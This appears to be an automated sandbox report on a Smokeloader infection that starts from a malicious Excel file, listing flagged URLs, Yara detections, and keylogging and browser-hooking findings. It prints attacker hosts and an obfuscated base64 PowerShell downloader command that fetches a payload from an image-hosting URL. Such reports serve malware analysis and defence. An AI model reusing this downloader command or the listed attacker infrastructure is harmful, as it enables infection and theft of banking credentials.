            Source: explorer.exe, 00000012.00000002.533939539.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.519823879.00000000000DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.524986516.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.618324003.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.565061083.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.618284548.0000000000314000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.618129405.000000000029E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.618251416.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.618233740.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: powershell.exe, 0000000A.00000002.548145744.0000000002491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: explorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.620228851.0000000007982000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472866046.000000000798D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.619575360.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472316615.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.620228851.0000000007982000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472866046.000000000798D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.619575360.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472316615.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
            Source: z2.ink.url.4.drString found in binary or memory: http://z2.ink/
            Source: #20240627_Edlen_B.xls, zBOD.url.4.drString found in binary or memory: http://z2.ink/zBOD
            Source: ~DF21EDD1AA520133CC.TMP.1.dr, 6B430000.1.drString found in binary or memory: http://z2.ink/zBODyX
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
            Source: wscript.exe, 00000009.00000003.425139237.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.425503976.0000000000856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oTxeD
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oTxeD9
            Source: wscript.exe, 00000009.00000002.425503976.0000000000814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oTxeDbZ~A
            Source: wscript.exe, 00000009.00000002.425503976.0000000000856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/oTxeDg
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 0000000C.00000002.461385343.00000000022EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
            Source: powershell.exe, 0000000C.00000002.470731184.0000000004DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/00
            Source: powershell.exe, 0000000C.00000002.460963541.0000000000100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.00000000022EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: D165.tmp.18.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49174 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 00000018.00000002.618080240.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.617958525.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3976, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4068, type: MEMORYSTR
            Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_0008162B GetKeyboardState,ToUnicode,29_2_0008162B

            E-Banking Fraud

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe22_2_00082EA8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe22_2_00083862

            System Summary

            barindex
            Source: 0000000D.00000002.473315966.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000D.00000002.473503358.0000000000181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 0000000E.00000002.619042204.00000000026E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3404, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6619CBCE.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: #20240627_Edlen_B.xlsOLE: Microsoft Excel 2007+
            Source: 6B430000.1.drOLE: Microsoft Excel 2007+
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zBOD.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.urlJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8798
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8798Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCD